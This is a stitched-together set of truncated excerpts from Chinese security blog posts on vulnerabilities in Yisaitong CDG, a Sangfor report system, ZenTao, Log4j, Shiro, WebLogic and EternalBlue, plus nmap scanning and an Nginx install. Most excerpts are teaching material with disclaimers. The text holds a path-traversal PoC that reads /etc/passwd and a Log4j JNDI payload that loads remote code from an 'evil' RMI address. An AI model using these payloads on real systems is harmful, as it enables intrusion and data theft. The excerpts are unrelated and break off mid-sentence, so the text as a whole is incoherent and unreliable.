亿赛通电子文档安全管理系统RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测:五、修复建议免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、产品简介亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根
漏洞描述:深信服应用交付报表系统download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。漏洞利用条件:download.php文件接口漏洞影响范围:应用交付报表系统漏洞复现:1、登录页面: 2.poc:/report/download.php?pdf=../../../../../etc/passwd 修复建议:对下载进行严格控制
如何使用kali系统中的nmap工具扫描网站漏洞1.我们打开kali在终端输入nmap可以看到nmap工具的所有参数如下图2.现在我们来使用nmap工具中的这个nmapwww.xxx.com命令来扫描网站开了那些端口如下图如图我们知道了网站开了那些端口现在我们运行这个nmap-sv-p端口--script=vulners(或者vuln)www.xxx.com如图如上图我们知道了这个网站存在cve和sql漏洞如果大家还有不懂的欢迎进QQ群交流851346179
一、永恒之蓝(Wannacry)漏洞简介1)一种“蠕虫式”的勒索病毒软件,利用windows的SMB漏洞传播,可以获取System最高权限;2)主要对windows服务器、主机有较大影响;黑客利用病毒对电脑重要文件进行加密,索要高比特币,是一种常见的“勒索病毒”;3)中国部分Windows操作系统用户遭受感染,校园网用户首当其冲,受害严重,大量实验室数据和毕业设计被锁定加密。部分大型企业的应用系统和数据库文件被加密后,无法正常工作,影响巨大。二、漏洞利用条件及工具1、目标机器使用win7/windowsserver2008R2操作系统2、目标机器需开启tcp_445文件共享端口3、使用Meta
漏洞简介禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。禅道后台存在RCE漏洞,存在于V18.0-18.3之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。环境搭建源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip利用phpstu
SQL注入mysql注入目的:获取当前web权限mysql注入--常规查询&union联合查询MYSQL--Web组成架构服务器搭建web服务可能存在多个站点搭建在一台服务器中,数据集中存储在数据库中,因此对数据库的管理也可以分为两种架构:统一用户管理数据库,即对所有站点数据库的管理均为Root权限用户管理一对一用户管理数据库,即对不同站点数据库管理分为不同用户管理各自站点数据信息(最小权限原则)判断注入点的四个信息系统----Windows/Linux(大小写敏感与否/文件路径选择)@@version_compile_os//查看当前数据库所在服务器系统用户----Root/普通用户(存在r
前言:log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。漏洞描述:由于ApacheLog4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。简单点说,就是可以通过输入一些具有特殊意义的字符来攻击服务器。如果入侵者在前端页面上输入了:${jndi:rmi://127.0.0.1:8080/evil}这串字符,然后后台用log4j记录了这串字符,log4j会自动使用jndi调用这个地址上的rmi内容。如果这个rmi的内容是删除数据库,重启服务器这种恶意程序
一、shiro反序列化漏洞1.2.4ApacheShiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的Cookie,在服务端对rememberMe的Cookie值先base64解码然后AES解密再反序列化序列化:序列化=》使用密钥进行AES加密=》base64加密反序列化:base64解密=》使用密钥进行AES解密=》反序列化因为默认密钥是开源的,如果使用默认密钥则可通过构造恶意代码进行反序列化攻击二、weblogic10.x1.war后门文件部署由于WebLogic后台存在弱口令,可直接登陆后台上传包含后门的war包2.反序列化漏洞weblogic在
网络安全-MS17-010漏洞-永恒之蓝这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西这个东东当时可谓是红极一时,现在也有点热度这个漏洞呢,在win10是不可以的,win8也是不行滴,只有win7以及以下的电脑,才有这个漏洞,因为win7之后微软把他给修复了win7靶机安装中(VM虚拟机)永恒之蓝漏洞原理通过TCP445端口,445端口(文件共享SMB协议专用)在那个年代,特别是中国的高校,默认情况下都是开启的,因为内网。去植入病毒。植入病毒後,就可以远程提权,有权限,就可以干很多事情,可以执行任意代码(包括恶意代码)WIN7需要的操作因为现在的win7你
目录一、Nginx安装 二、docker验证标签漏洞一、Nginx安装1.首先创建Nginx的目录并进入:mkdir/soft&&mkdir/soft/nginx/cd/soft/nginx/2.下载Nginx的安装包,可以通过FTP工具上传离线环境包,也可通过wget命令在线获取安装包:wgethttps://nginx.org/download/nginx-1.21.6.tar.gz没有wget命令的可通过yum命令安装:yum-yinstallwget3.解压Nginx的压缩包:tar-xvzfnginx-1.21.6.tar.gz4.下载并安装Nginx所需的依赖库和包:yuminst
